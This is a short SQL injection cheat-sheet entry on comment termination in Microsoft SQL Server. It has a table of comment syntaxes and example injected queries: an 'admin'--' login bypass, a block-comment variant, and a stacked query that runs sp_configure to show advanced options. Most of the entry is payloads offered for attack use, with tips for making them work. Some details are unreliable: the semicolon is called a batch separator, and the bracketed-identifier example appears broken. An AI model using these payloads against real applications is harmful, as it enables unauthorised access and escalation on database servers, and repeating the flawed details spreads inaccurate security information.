Comment Out Query
In SQL injection attacks, commenting out the remainder of a query is often necessary to ensure that the injection payload works correctly without syntax errors. This technique is commonly known as “comment termination.”
In Microsoft SQL Server (MSSQL), you can use the following methods to comment out the rest of a query:
| Comment Type | Syntax | Description |
|---|---|---|
| Single-line comment | `--` | Requires a space after the dashes |
| Inline/block comment | `/*...*/` | Can span multiple lines |
| Batch separator | `;` | Terminates the current batch |
| Bracketed identifier | `[ANYTHING]` | In specific contexts only |
Examples
```sql
-- Example 1: Using -- to comment out the rest of the query
SELECT * FROM Users WHERE username = 'admin'-- ' AND password = 'password'

-- Example 2: Using /* */ for inline commenting
SELECT * FROM Users WHERE username = 'admin'/* ' AND password = 'password' */

-- Example 3: Using ; to terminate and start a new query
SELECT * FROM Users WHERE username = 'admin'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;

-- Example 4: Brackets can sometimes be used in specific contexts
SELECT * FROM Users WHERE username = 'admin'['];
```
Notes
- MSSQL requires a space or new line after the `--` comment syntax.
- In some cases, MSSQL ignores comment syntax in strings, so ensure that your injection point has proper quoting.
- Using the `;` batch separator can be particularly powerful as it allows execution of additional SQL statements.
- When using batch separators, be aware that permissions and error handling may differ from the original query.